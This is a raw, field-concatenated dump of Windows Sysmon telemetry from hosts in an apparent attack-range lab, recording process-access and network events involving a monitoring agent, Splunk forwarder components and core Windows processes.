Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000041353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.738{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.730{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.719{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.707{FE4C2B44-E40F-63C7-1C06-00000000AF02}65565564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.687{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.686{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000041345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E40F-63C7-1C06-00000000AF02}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E40F-63C7-1C06-00000000AF02}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.441{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E40F-63C7-1C06-00000000AF02}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.442{FE4C2B44-E40F-63C7-1C06-00000000AF02}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:31.191{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF30E4A216F8C1C1AE032D54E5681622,SHA256=D998BFD4751B139CB28DFD9FFA3D45F7C1D8C7CBB08A9EFCB5A3549075CF77EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016097Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.768{E5A8D418-E40F-63C7-F801-00000000B002}30483944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016096Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.018{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50078-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000016095Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E40F-63C7-F801-00000000B002}3048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016094Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016093Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016092Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016091Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016090Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016089Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016088Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016087Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:31.611{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016086Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 